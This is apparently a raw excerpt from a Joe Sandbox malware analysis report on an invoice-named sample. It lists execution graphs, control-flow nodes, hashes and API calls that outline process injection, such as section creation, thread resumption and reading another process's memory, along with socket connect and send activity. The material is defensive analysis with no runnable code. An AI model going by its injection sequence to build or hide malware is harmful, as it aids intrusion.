                                                  • Opcode ID: 6db886b4f34fd60ffa4ca4a4efb44e897c579ce84b551c216e37726dcb25acf3
                                                  • Instruction ID: cc78eb44c48a919e4d7b332c8d6d0648a314dad7e59dbafde54c604978cc2391
                                                  • Opcode Fuzzy Hash: 6db886b4f34fd60ffa4ca4a4efb44e897c579ce84b551c216e37726dcb25acf3
                                                  • Instruction Fuzzy Hash: 3041A2B9A20211DFD705CF1AC4846657BF6FF58714BA0806AED08CF360D730E891CBA0
                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.84426043945.0000000036700000.00000040.00001000.00020000.00000000.sdmp, Offset: 36700000, based on PE: true
                                                  • Associated: 00000002.00000002.84426043945.0000000036829000.00000040.00001000.00020000.00000000.sdmp
                                                  • Associated: 00000002.00000002.84426043945.000000003682D000.00000040.00001000.00020000.00000000.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_2_2_36700000_FACTURA PROFORMA MATRICULACI#U00d3N.jbxd
                                                  Similarity
                                                  • API ID: DebugPrintTimes
                                                  • String ID: 0$0
                                                  • API String ID: 3446177414-203156872
                                                  • Opcode ID: 938fdb0cf9d328f53067c5ea5d577fd6b00a736ef731358fd6dd25dcb631378e
                                                  • Instruction ID: 78cbc0e0617bd6aee035d16b03ed250b0acdb363f65ea2257df8af4fd5568b16
                                                  • Opcode Fuzzy Hash: 938fdb0cf9d328f53067c5ea5d577fd6b00a736ef731358fd6dd25dcb631378e
                                                  • Instruction Fuzzy Hash: 694159B1A187419FD300CF29C444A5BBBE5BB8C358F544A2EF598DB200D771EA05CF96
                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.84426043945.0000000036700000.00000040.00001000.00020000.00000000.sdmp, Offset: 36700000, based on PE: true
                                                  • Associated: 00000002.00000002.84426043945.0000000036829000.00000040.00001000.00020000.00000000.sdmp
                                                  • Associated: 00000002.00000002.84426043945.000000003682D000.00000040.00001000.00020000.00000000.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_2_2_36700000_FACTURA PROFORMA MATRICULACI#U00d3N.jbxd
                                                  Similarity
                                                  • API ID: DebugPrintTimes
                                                  • String ID: r6$mr6
                                                  • API String ID: 3446177414-3552528108
                                                  • Opcode ID: cdf4abb7b3833821000cac7db97b89ab943713f421934e46348b7cb070041e24
                                                  • Instruction ID: de10c95b0965139fc629fe67034e45ff95b1e5a0d5ee0c02d90e82fd0d73a0fd
                                                  • Opcode Fuzzy Hash: cdf4abb7b3833821000cac7db97b89ab943713f421934e46348b7cb070041e24
                                                  • Instruction Fuzzy Hash: BB11C6B5A01218AFDF11CF98D885ADEBBB9FF4C360F10411AF911B7240D735A954CB61

                                                  Execution Graph

                                                  Execution Coverage:2.9%
                                                  Dynamic/Decrypted Code Coverage:0%
                                                  Signature Coverage:0%
                                                  Total number of Nodes:39
                                                  Total number of Limit Nodes:3
                                                  execution_graph 10054 6e947d 10056 6e94d0 10054->10056 10055 6e9504 socket 10056->10055 10057 6e95bd 10059 6e9611 10057->10059 10058 6e9645 send 10059->10058 10060 49168f2 10063 49168f8 10060->10063 10064 491693e 10060->10064 10061 4916911 SleepEx 10062 4916961 NtCreateSection 10061->10062 10061->10063 10062->10064 10063->10061 10063->10064 10065 6e09fb 10066 6e0a1a 10065->10066 10067 6e0a52 10065->10067 10068 6e0ae8 10067->10068 10069 6e0aba CreateThread 10067->10069 10070 6e9727 10072 6e9765 10070->10072 10071 6e9799 closesocket 10072->10071 10073 6e9675 10075 6e96c1 10073->10075 10074 6e96f5 connect 10075->10074 10076 6eab12 10077 6eab40 10076->10077 10078 6eab44 10077->10078 10079 6eab80 LdrLoadDll 10077->10079 10079->10078 10080 6e1753 10081 6e1756 10080->10081 10083 6e16e2 10080->10083 10082 6e16cb SleepEx 10082->10083 10083->10082 10084 491acaf 10086 491acb4 10084->10086 10085 491adb3 10086->10085 10088 4916a81 10086->10088 10090 4916aa7 10088->10090 10089 4916ae1 SleepEx 10089->10090 10093 4916b15 10089->10093 10090->10089 10091 4916acc 10090->10091 10091->10085 10092 4916b54 NtResumeThread 10092->10091 10093->10091 10093->10092

                                                  Control-flow Graph

                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000003.00000002.88179273317.0000000004560000.00000040.00000001.00040000.00000000.sdmp, Offset: 04560000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_3_2_4560000_RAVCpl64.jbxd
                                                  Similarity
                                                  • API ID: CreateSectionSleep
                                                  • String ID: 0$@$@
                                                  • API String ID: 2866269021-3221051908
                                                  • Opcode ID: fc45fb12322c9bbd596d57ba46e0c8d5ccb8360e8d10f49c3a42f189b3336a1f
                                                  • Instruction ID: 0df1d41342c560c363a801c5aa4ecdefcbe080f91b8e6229c34f57661df6732e
                                                  • Opcode Fuzzy Hash: fc45fb12322c9bbd596d57ba46e0c8d5ccb8360e8d10f49c3a42f189b3336a1f
                                                  • Instruction Fuzzy Hash: 4A518C70A28B5C8FDB15DF58D88179EBBF4FB48704F10052EE88A93250DB34E946CB86

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 35 4916a7d-4916aa0 36 4916aa7-4916aca call 49232b1 35->36 37 4916aa2 call 4912d21 35->37 40 4916ad4-4916adb 36->40 41 4916acc-4916ad2 36->41 37->36 43 4916ae1-4916aeb SleepEx 40->43 42 4916b01-4916b14 41->42 44 4916b15-4916b1d 43->44 45 4916aed-4916af2 43->45 47 4916b54-4916b61 NtResumeThread 44->47 48 4916b1f-4916b52 call 4912dc1 call 49232b1 44->48 45->43 46 4916af4-4916afa 45->46 50 4916afc-4916afd 46->50 47->46 49 4916b63-4916b6e 47->49 48->46 48->47 49->50 50->42
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000003.00000002.88179273317.0000000004560000.00000040.00000001.00040000.00000000.sdmp, Offset: 04560000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_3_2_4560000_RAVCpl64.jbxd
                                                  Similarity
                                                  • API ID: ResumeSleepThread
                                                  • String ID:
                                                  • API String ID: 1530989685-0
                                                  • Opcode ID: 0f96f8a897115e142e492e09e5cffea6088568a056a5b9c5f994fc7c8a78ac3f
                                                  • Instruction ID: 1f6faf2c49c6b50dda7e0800f6eb9abbabf9e3a0a07349988cd11bd85596fc38
                                                  • Opcode Fuzzy Hash: 0f96f8a897115e142e492e09e5cffea6088568a056a5b9c5f994fc7c8a78ac3f
                                                  • Instruction Fuzzy Hash: 5021F470618B4D8FDBA8EF2884557AAB7D1FB44314F00063ED85AC32A0EF70E941C745

                                                  Control-flow Graph

                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000003.00000002.88173877296.00000000006C0000.00000040.80000000.00040000.00000000.sdmp, Offset: 006C0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_3_2_6c0000_RAVCpl64.jbxd
                                                  Similarity
                                                  • API ID: CreateThread
                                                  • String ID: $
                                                  • API String ID: 2422867632-3993045852
                                                  • Opcode ID: 2e0b7a8a222ba6ccb2c52433aeac9efdb1a65178ebba2748599ec5676da14f73
                                                  • Instruction ID: 9ab237a2d4208fe4f362c33fb1b096c9975e2d6bac4311a557ede6ba2d0525b8
                                                  • Opcode Fuzzy Hash: 2e0b7a8a222ba6ccb2c52433aeac9efdb1a65178ebba2748599ec5676da14f73
                                                  • Instruction Fuzzy Hash: 8A21053120C7894FE748DB68E08A3AAB7D1FB99324F0541BED549CB183EB7A9446C746

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 55 6e95bd-6e9619 call 6e6158 58 6e961b-6e963f call 6ec8c8 55->58 59 6e9645-6e9670 send 55->59 58->59
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000003.00000002.88173877296.00000000006C0000.00000040.80000000.00040000.00000000.sdmp, Offset: 006C0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_3_2_6c0000_RAVCpl64.jbxd
                                                  Similarity
                                                  • API ID: send
                                                  • String ID:
                                                  • API String ID: 2809346765-0
                                                  • Opcode ID: 7de86bc22e9b085984046479f86baee8ea80efc2966d967a292083424153b4be
                                                  • Instruction ID: ab5be8061e4f7eb8a6f9b997f2db6c4e5e7683c22feddff8e54cbd8386dadf44
                                                  • Opcode Fuzzy Hash: 7de86bc22e9b085984046479f86baee8ea80efc2966d967a292083424153b4be
                                                  • Instruction Fuzzy Hash: 4F215E3051CB448FDB58EF28908865ABBE1FBAC310F04057EE84DCB24BDA709855CB9A

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 62 6e1688-6e16c7 call 6dc338 call 6ec8c8 67 6e173e-6e174d 62->67 68 6e16c9 62->68 69 6e16cb-6e16e0 SleepEx 68->69 70 6e172b-6e1732 69->70 71 6e16e2-6e16e9 69->71 70->69 72 6e1734-6e173c call 6e1608 70->72 71->69 73 6e16eb-6e16fc 71->73 72->69 73->69 75 6e16fe-6e1704 73->75 75->69 77 6e1706-6e1709 75->77 77->69 78 6e170b-6e1729 call 6e7be8 call 6e0188 call 6e02d8 77->78 78->69
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000003.00000002.88173877296.00000000006C0000.00000040.80000000.00040000.00000000.sdmp, Offset: 006C0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_3_2_6c0000_RAVCpl64.jbxd
                                                  Similarity
                                                  • API ID: Sleep
                                                  • String ID:
                                                  • API String ID: 3472027048-0
                                                  • Opcode ID: a04d26c10803e220b180e3badebe0fda629a4daea35a995057117d534a0e6b48
                                                  • Instruction ID: 758af721418aba96f4b0dc4bd9895829781a2d465e668b9f0bce3f7c85d38e91
                                                  • Opcode Fuzzy Hash: a04d26c10803e220b180e3badebe0fda629a4daea35a995057117d534a0e6b48
                                                  • Instruction Fuzzy Hash: 3F11C830615B884FDF94EF2985C46A973E2FB49740F58057DE84ECF356CB3488419B56

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 85 6e947d-6e94d8 call 6e6028 88 6e94da-6e94fe call 6ec8c8 85->88 89 6e9504-6e9525 socket 85->89 88->89
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000003.00000002.88173877296.00000000006C0000.00000040.80000000.00040000.00000000.sdmp, Offset: 006C0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_3_2_6c0000_RAVCpl64.jbxd
                                                  Similarity
                                                  • API ID: socket
                                                  • String ID:
                                                  • API String ID: 98920635-0
                                                  • Opcode ID: f2a46dcd14b7ca573d5ebfde7a9b86dd521c7b65b41db5d66ccc8709a4425658
                                                  • Instruction ID: 3c312bce45851a323e34a3fb8e77dd1be73210f6c531e21a91cc900682fa380c
                                                  • Opcode Fuzzy Hash: f2a46dcd14b7ca573d5ebfde7a9b86dd521c7b65b41db5d66ccc8709a4425658
                                                  • Instruction Fuzzy Hash: 44114F3091CB448FDB48EF28D08965ABBE1FFA8314F0401BEE84DCB25ADB709555CB96

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 92 6e9675-6e96c9 call 6e61e8 95 6e96cb-6e96ef call 6ec8c8 92->95 96 6e96f5-6e9718 connect 92->96 95->96
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000003.00000002.88173877296.00000000006C0000.00000040.80000000.00040000.00000000.sdmp, Offset: 006C0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_3_2_6c0000_RAVCpl64.jbxd
                                                  Similarity
                                                  • API ID: connect
                                                  • String ID:
                                                  • API String ID: 1959786783-0
                                                  • Opcode ID: b41e8273cd8d19561302481d2ff4a20ace1265fa65d4cd0316eca4a94463a0a0
                                                  • Instruction ID: 033f11f1c2d09ee9620004ada2275fea8c7150bc31d6ab76f386a424419e173e
                                                  • Opcode Fuzzy Hash: b41e8273cd8d19561302481d2ff4a20ace1265fa65d4cd0316eca4a94463a0a0
                                                  • Instruction Fuzzy Hash: 04114C3091CB488FDB98EF28D08965A7BE2FBA8300F0401BEE84DCB24ADB70C554C795

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 99 6eab12-6eab42 call 6ed858 102 6eab4f-6eab5b call 6f0d68 99->102 103 6eab44-6eab4e 99->103 106 6eab5d-6eab64 call 6f1038 102->106 107 6eab69-6eab7e call 6ed048 102->107 106->107 111 6eab9c-6eaba4 107->111 112 6eab80-6eab95 LdrLoadDll 107->112 112->111
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000003.00000002.88173877296.00000000006C0000.00000040.80000000.00040000.00000000.sdmp, Offset: 006C0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_3_2_6c0000_RAVCpl64.jbxd
                                                  Similarity
                                                  • API ID: Load
                                                  • String ID:
                                                  • API String ID: 2234796835-0
                                                  • Opcode ID: 9d8e23ecbd5419cb660ffa1b03479b4057796c57d98b3eb7cb2d680b9da197bd
                                                  • Instruction ID: 24690d4d40a3c90e3d2784c9929bf382099a8501792232285d0a7469aaecdd0c
                                                  • Opcode Fuzzy Hash: 9d8e23ecbd5419cb660ffa1b03479b4057796c57d98b3eb7cb2d680b9da197bd
                                                  • Instruction Fuzzy Hash: 6901D831518B884BDB54EB76C8C9AA773D2FFD8305F04053EA44EC6250EA35E645C747

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 113 6e9727-6e976d call 6e6278 116 6e976f-6e9793 call 6ec8c8 113->116 117 6e9799-6e97ac closesocket 113->117 116->117
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000003.00000002.88173877296.00000000006C0000.00000040.80000000.00040000.00000000.sdmp, Offset: 006C0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_3_2_6c0000_RAVCpl64.jbxd
                                                  Similarity
                                                  • API ID: closesocket
                                                  • String ID:
                                                  • API String ID: 2781271927-0
                                                  • Opcode ID: a69c29d284226ff3f832cf9d72fe22d174a26eba7ad527f7de551f70b980c483
                                                  • Instruction ID: 20dd38858fe98240db94a390cf6225de9b8de1d6c0c83a60312b51a79665cc61
                                                  • Opcode Fuzzy Hash: a69c29d284226ff3f832cf9d72fe22d174a26eba7ad527f7de551f70b980c483
                                                  • Instruction Fuzzy Hash: 93014C30518B488FDB90EF28C088BAAB7E2FBA8301F440A6EF88DC7255DB3590548756

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 120 6e971a-6e9722 121 6e974d-6e975c 120->121 122 6e9724 120->122 123 6e9765-6e976d 121->123 124 6e9760 call 6e6278 121->124 122->121 125 6e976f-6e9793 call 6ec8c8 123->125 126 6e9799-6e97ac closesocket 123->126 124->123 125->126
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000003.00000002.88173877296.00000000006C0000.00000040.80000000.00040000.00000000.sdmp, Offset: 006C0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_3_2_6c0000_RAVCpl64.jbxd
                                                  Similarity
                                                  • API ID: closesocket
                                                  • String ID:
                                                  • API String ID: 2781271927-0
                                                  • Opcode ID: d6d58b28d3d395d618d8cf107967b6151541fb4db110b9ec8b7e26213d9ecb8c
                                                  • Instruction ID: 6359752a1df0a6c68addeadbd6d4890fa0c61d62cbe027fe02aabb4bf93ee75c
                                                  • Opcode Fuzzy Hash: d6d58b28d3d395d618d8cf107967b6151541fb4db110b9ec8b7e26213d9ecb8c
                                                  • Instruction Fuzzy Hash: DBF0AF301597848FDB91EF14C08479977E2FF94300F040A7DE889CB246DB3490568B66

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 129 6e1753-6e1754 130 6e1756 129->130 131 6e1734-6e173c call 6e1608 129->131 134 6e16cb-6e16e0 SleepEx 131->134 135 6e172b-6e1732 134->135 136 6e16e2-6e16e9 134->136 135->131 135->134 136->134 137 6e16eb-6e16fc 136->137 137->134 138 6e16fe-6e1704 137->138 138->134 139 6e1706-6e1709 138->139 139->134 140 6e170b-6e1729 call 6e7be8 call 6e0188 call 6e02d8 139->140 140->134
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000003.00000002.88173877296.00000000006C0000.00000040.80000000.00040000.00000000.sdmp, Offset: 006C0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_3_2_6c0000_RAVCpl64.jbxd
                                                  Similarity
                                                  • API ID: Sleep
                                                  • String ID:
                                                  • API String ID: 3472027048-0
                                                  • Opcode ID: 8c8c5e229f39aa4b9951c2bd97afd25daccc30227bc0b4749955ad953c2fa1e1
                                                  • Instruction ID: 04429a87301ed1723640dd1051e5de5dc67a23043f0ec3017aa788aef1131b41
                                                  • Opcode Fuzzy Hash: 8c8c5e229f39aa4b9951c2bd97afd25daccc30227bc0b4749955ad953c2fa1e1
                                                  • Instruction Fuzzy Hash: 17F09630617B848FCFA5AF1686C46A833A3FB45741F5804BDD40A4E253CA344881AE55

                                                  Execution Graph

                                                  Execution Coverage:0.4%
                                                  Dynamic/Decrypted Code Coverage:91.7%
                                                  Signature Coverage:0%
                                                  Total number of Nodes:12
                                                  Total number of Limit Nodes:1
                                                  execution_graph 82430 4c1f026 82431 4c1f043 82430->82431 82432 4c1f1c9 NtQueryInformationProcess 82431->82432 82435 4c1f23c 82431->82435 82433 4c1f203 82432->82433 82434 4c1f2e1 NtReadVirtualMemory 82433->82434 82433->82435 82434->82435 82437 4882b20 82439 4882b2a 82437->82439 82440 4882b3f LdrInitializeThunk 82439->82440 82441 4882b31 82439->82441 82444 48829f0 LdrInitializeThunk 82429 28e97d1 NtClose

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 0 4c1f01d-4c1f01f 1 4c1f021 0->1 2 4c1f094-4c1f19a call 4c1ef58 call 4c21318 call 4c25284 call 4c103d8 call 4c208c8 call 4c103d8 call 4c208c8 call 4c22fe8 0->2 4 4c1f043-4c1f04b 1->4 5 4c1f023 1->5 30 4c1f1a0-4c1f23a call 4c103d8 call 4c208c8 NtQueryInformationProcess call 4c21318 call 4c103d8 call 4c208c8 2->30 31 4c1f66a-4c1f671 call 4c1ef58 2->31 6 4c1f069-4c1f088 call 4c21318 call 4c1d088 4->6 7 4c1f04d-4c1f064 call 4c212f8 4->7 5->4 19 4c1f676-4c1f681 6->19 20 4c1f08e-4c1f08f 6->20 7->6 20->2 43 4c1f23c-4c1f249 30->43 44 4c1f24e-4c1f2ca call 4c25292 call 4c103d8 call 4c208c8 30->44 31->19 43->31 44->43 53 4c1f2d0-4c1f2df call 4c252bc 44->53 56 4c1f2e1-4c1f327 NtReadVirtualMemory call 4c22008 53->56 57 4c1f32c-4c1f372 call 4c103d8 call 4c208c8 call 4c23948 53->57 56->31 66 4c1f391-4c1f48d call 4c103d8 call 4c208c8 call 4c252ca call 4c103d8 call 4c208c8 call 4c23308 call 4c212c8 * 3 call 4c252bc 57->66 67 4c1f374-4c1f38c 57->67 90 4c1f4bd-4c1f4d2 call 4c252bc 66->90 91 4c1f48f-4c1f4bb call 4c252bc call 4c212c8 call 4c2531e call 4c252d8 66->91 67->31 96 4c1f4d4-4c1f4f6 call 4c22ab8 90->96 97 4c1f4fb-4c1f50d call 4c21f48 90->97 102 4c1f512-4c1f51c 91->102 96->97 97->102 104 4c1f5e1-4c1f64a call 4c103d8 call 4c208c8 call 4c23c68 102->104 105 4c1f522-4c1f572 call 4c103d8 call 4c208c8 call 4c23628 call 4c252bc 102->105 104->31 130 4c1f64c-4c1f665 call 4c212f8 104->130 124 4c1f574-4c1f59d call 4c25368 call 4c2531e 105->124 125 4c1f5a7-4c1f5af call 4c252bc 105->125 124->125 125->104 134 4c1f5b1-4c1f5bc 125->134 130->31 134->104 136 4c1f5be-4c1f5dc call 4c23f88 134->136 136->104
                                                  APIs
                                                  • NtQueryInformationProcess.NTDLL ref: 04C1F1E8
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000004.00000002.84739097413.0000000004C10000.00000040.00000800.00020000.00000000.sdmp, Offset: 04C10000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_4_2_4c10000_rasphone.jbxd
                                                  Similarity
                                                  • API ID: InformationProcessQuery
                                                  • String ID: 0$4`jc
                                                  • API String ID: 1778838933-4258150611
                                                  • Opcode ID: 6bc54acaaf07a6b51117803e740ac15cb168ba4d6aa242876aa84b2e09eed931
                                                  • Instruction ID: c67a69daa4acbb920b4803ae72a9673d0ac97396e9da235f6cd00d2b2d00ef76
                                                  • Opcode Fuzzy Hash: 6bc54acaaf07a6b51117803e740ac15cb168ba4d6aa242876aa84b2e09eed931
                                                  • Instruction Fuzzy Hash: A2024B70518A8C8FDBA5EF68C894AEE77E2FB99304F40062ED94EC7250DF74A641DB41

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 138 4c1f026-4c1f04b 140 4c1f069-4c1f088 call 4c21318 call 4c1d088 138->140 141 4c1f04d-4c1f064 call 4c212f8 138->141 147 4c1f676-4c1f681 140->147 148 4c1f08e-4c1f19a call 4c1ef58 call 4c21318 call 4c25284 call 4c103d8 call 4c208c8 call 4c103d8 call 4c208c8 call 4c22fe8 140->148 141->140 166 4c1f1a0-4c1f23a call 4c103d8 call 4c208c8 NtQueryInformationProcess call 4c21318 call 4c103d8 call 4c208c8 148->166 167 4c1f66a-4c1f671 call 4c1ef58 148->167 179 4c1f23c-4c1f249 166->179 180 4c1f24e-4c1f2ca call 4c25292 call 4c103d8 call 4c208c8 166->180 167->147 179->167 180->179 189 4c1f2d0-4c1f2df call 4c252bc 180->189 192 4c1f2e1-4c1f322 NtReadVirtualMemory call 4c22008 189->192 193 4c1f32c-4c1f372 call 4c103d8 call 4c208c8 call 4c23948 189->193 196 4c1f327 192->196 202 4c1f391-4c1f48d call 4c103d8 call 4c208c8 call 4c252ca call 4c103d8 call 4c208c8 call 4c23308 call 4c212c8 * 3 call 4c252bc 193->202 203 4c1f374-4c1f38c 193->203 196->167 226 4c1f4bd-4c1f4d2 call 4c252bc 202->226 227 4c1f48f-4c1f4bb call 4c252bc call 4c212c8 call 4c2531e call 4c252d8 202->227 203->167 232 4c1f4d4-4c1f4f6 call 4c22ab8 226->232 233 4c1f4fb-4c1f50d call 4c21f48 226->233 238 4c1f512-4c1f51c 227->238 232->233 233->238 240 4c1f5e1-4c1f64a call 4c103d8 call 4c208c8 call 4c23c68 238->240 241 4c1f522-4c1f572 call 4c103d8 call 4c208c8 call 4c23628 call 4c252bc 238->241 240->167 266 4c1f64c-4c1f665 call 4c212f8 240->266 260 4c1f574-4c1f59d call 4c25368 call 4c2531e 241->260 261 4c1f5a7-4c1f5af call 4c252bc 241->261 260->261 261->240 270 4c1f5b1-4c1f5bc 261->270 266->167 270->240 272 4c1f5be-4c1f5dc call 4c23f88 270->272 272->240
                                                  APIs
                                                  • NtQueryInformationProcess.NTDLL ref: 04C1F1E8
                                                  • NtReadVirtualMemory.NTDLL ref: 04C1F2FC
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000004.00000002.84739097413.0000000004C10000.00000040.00000800.00020000.00000000.sdmp, Offset: 04C10000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_4_2_4c10000_rasphone.jbxd
                                                  Similarity
                                                  • API ID: InformationMemoryProcessQueryReadVirtual
                                                  • String ID: 0$=@UW
                                                  • API String ID: 1498878907-3252809520
                                                  • Opcode ID: 5e7dc53e350adfd97784ee7c216314ce44382a1c67372222a9c5629d80bf7ee6
                                                  • Instruction ID: 73218aeaac92b83541cb66da9984f4ef27cc3c5149ad57e18de1396cf79bf43d
                                                  • Opcode Fuzzy Hash: 5e7dc53e350adfd97784ee7c216314ce44382a1c67372222a9c5629d80bf7ee6
                                                  • Instruction Fuzzy Hash: 426170B0918A8C8FEBA5EF28C8546EE77E1FB99304F50062ED54EC7250DF349245DB41

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 274 28e97d1-28e97e4 NtClose
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000004.00000002.84736222975.00000000028C0000.00000040.80000000.00040000.00000000.sdmp, Offset: 028C0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_4_2_28c0000_rasphone.jbxd
                                                  Similarity
                                                  • API ID: Close
                                                  • String ID:
                                                  • API String ID: 3535843008-0
                                                  • Opcode ID: 90dc3e58b1d90dd73f62b890fe378dad21b7c367edde4546ad5def4ba94215e2
                                                  • Instruction ID: 895d44e4c001b43a6c3083fcc40c82450ff85b64ac6076447ec573d2c4e52c17
                                                  • Opcode Fuzzy Hash: 90dc3e58b1d90dd73f62b890fe378dad21b7c367edde4546ad5def4ba94215e2
                                                  • Instruction Fuzzy Hash: B8B09B715DD6A21D4717D5244840417E5579C42115709466B5182CB743CF119011C3C2

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 289 4882cf0-4882cfc LdrInitializeThunk
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000004.00000002.84738131088.0000000004810000.00000040.00001000.00020000.00000000.sdmp, Offset: 04810000, based on PE: true
                                                  • Associated: 00000004.00000002.84738131088.0000000004939000.00000040.00001000.00020000.00000000.sdmp
                                                  • Associated: 00000004.00000002.84738131088.000000000493D000.00000040.00001000.00020000.00000000.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_4_2_4810000_rasphone.jbxd
                                                  Similarity
                                                  • API ID: InitializeThunk
                                                  • String ID:
                                                  • API String ID: 2994545307-0
                                                  • Opcode ID: 29aa3e87c89a11bd9adc64a32bd935747918bb24de2d357bcb8ff94aaf925254
                                                  • Instruction ID: 09aa54c6ebbeff8c55093bde29f19f92d6417256a9814a3e03c16fefff7edfa8
                                                  • Opcode Fuzzy Hash: 29aa3e87c89a11bd9adc64a32bd935747918bb24de2d357bcb8ff94aaf925254
                                                  • Instruction Fuzzy Hash: C1900221262442527D45B1584504507404697E2285795C956A240E950CC536EC5AF631

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 288 4882c30-4882c3c LdrInitializeThunk
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000004.00000002.84738131088.0000000004810000.00000040.00001000.00020000.00000000.sdmp, Offset: 04810000, based on PE: true
                                                  • Associated: 00000004.00000002.84738131088.0000000004939000.00000040.00001000.00020000.00000000.sdmp
                                                  • Associated: 00000004.00000002.84738131088.000000000493D000.00000040.00001000.00020000.00000000.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_4_2_4810000_rasphone.jbxd
                                                  Similarity
                                                  • API ID: InitializeThunk
                                                  • String ID:
                                                  • API String ID: 2994545307-0
                                                  • Opcode ID: ea730d5574428629a322456b09b031dfbdbfa393025a984e9377e155e57b8781
                                                  • Instruction ID: 7dd5ab057473d9b36fc9df8af71c5c77579646c558e78a4414bfdc5d666b6c03
                                                  • Opcode Fuzzy Hash: ea730d5574428629a322456b09b031dfbdbfa393025a984e9377e155e57b8781
                                                  • Instruction Fuzzy Hash: 3890022923340102F9807158550860A004587D3246F95DD59A100F558CC935DC6D7331
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000004.00000002.84738131088.0000000004810000.00000040.00001000.00020000.00000000.sdmp, Offset: 04810000, based on PE: true
                                                  • Associated: 00000004.00000002.84738131088.0000000004939000.00000040.00001000.00020000.00000000.sdmp
                                                  • Associated: 00000004.00000002.84738131088.000000000493D000.00000040.00001000.00020000.00000000.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_4_2_4810000_rasphone.jbxd
                                                  Similarity
                                                  • API ID: InitializeThunk
                                                  • String ID:
                                                  • API String ID: 2994545307-0
                                                  • Opcode ID: fa8c10da1fc16cfdfc31d40b04f772075beaa40855714268516489266d8b3673
                                                  • Instruction ID: c5fe742174fceb51916b957f2f46a8a9aeeda8f15109a58e4ddbd0eab159a631
                                                  • Opcode Fuzzy Hash: fa8c10da1fc16cfdfc31d40b04f772075beaa40855714268516489266d8b3673
                                                  • Instruction Fuzzy Hash: EF90023122140513F91171584604707004987D2285F95CD56A141E558DD676DD56B131
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000004.00000002.84738131088.0000000004810000.00000040.00001000.00020000.00000000.sdmp, Offset: 04810000, based on PE: true
                                                  • Associated: 00000004.00000002.84738131088.0000000004939000.00000040.00001000.00020000.00000000.sdmp
                                                  • Associated: 00000004.00000002.84738131088.000000000493D000.00000040.00001000.00020000.00000000.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_4_2_4810000_rasphone.jbxd
                                                  Similarity
                                                  • API ID: InitializeThunk
                                                  • String ID:
                                                  • API String ID: 2994545307-0
                                                  • Opcode ID: b5ceef0164df86395e39c7eab5721e7e0ecd0792cd23a32cab58edce36df7ee4
                                                  • Instruction ID: d869b3f69e6d9e3b051b81864953a485293e948ccbda80b4d190b369fc2fcb71
                                                  • Opcode Fuzzy Hash: b5ceef0164df86395e39c7eab5721e7e0ecd0792cd23a32cab58edce36df7ee4
